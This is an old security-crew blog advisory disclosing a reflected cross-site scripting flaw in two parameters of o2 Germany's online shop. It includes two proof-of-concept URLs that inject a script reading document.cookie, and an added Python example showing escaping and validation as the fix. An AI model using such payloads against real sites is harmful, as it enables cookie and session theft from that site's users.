by r0t, der4444, cembo, VietMafia

Wednesday, December 07, 2005

shop2.o2online.de XSS vuln.

o2 is my favorite mobile phone operator, that's why I checked their website.

Vuln. description.

The o2 shop contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "nidx" and "tariffType" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

live examples:


http://shop2.o2online.de/o2/interessenten/necos/handys/siemens/index.html?nidx=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


http://shop2.o2online.de/o2/interessenten/necos/handys/siemens/index.html?nidx=6&tariffType=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
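Added example, not part of the original advisory and not the shop's own code: it decodes the two URLs above and shows the reflected value with and without output encoding, plus allow-list validation of both parameters. The HTML template (a quoted attribute value), the parameter formats in `VALIDATORS` and all function names are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# The two URLs published in this advisory.
BASE = "http://shop2.o2online.de/o2/interessenten/necos/handys/siemens/index.html"
SAMPLE_URLS = [
    BASE + "?nidx=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    BASE + "?nidx=6&tariffType=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
]

# Assumption: each parameter is echoed into a quoted attribute value.
TEMPLATE = '<input type="hidden" name="{name}" value="{value}">'

# Assumption: nidx is a short number, tariffType a short token.
VALIDATORS = {
    "nidx": re.compile(r"\d{1,6}"),
    "tariffType": re.compile(r"[A-Za-z0-9_-]{0,32}"),
}


def params(url):
    """Return the URL-decoded nidx and tariffType values ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: query.get(name, [""])[0] for name in VALIDATORS}


def render_unsafe(url):
    """The flaw described above: decoded input is returned unmodified."""
    return "".join(TEMPLATE.format(name=n, value=v) for n, v in params(url).items())


def render_escaped(url):
    """Output encoding for a quoted HTML attribute: & < > \" ' become entities."""
    return "".join(
        TEMPLATE.format(name=n, value=html.escape(v, quote=True))
        for n, v in params(url).items()
    )


def validate(url):
    """Return the names of parameters that fail allow-list validation."""
    return [n for n, v in params(url).items() if not VALIDATORS[n].fullmatch(v)]


if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        print("rejected:", validate(sample))
        print("escaped :", render_escaped(sample))
```

Validation rejects the request early; the encoding in `render_escaped` is what keeps any value that does get through from leaving the attribute it was written into.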

Copyright (c) 2006 Pridels Sec Crew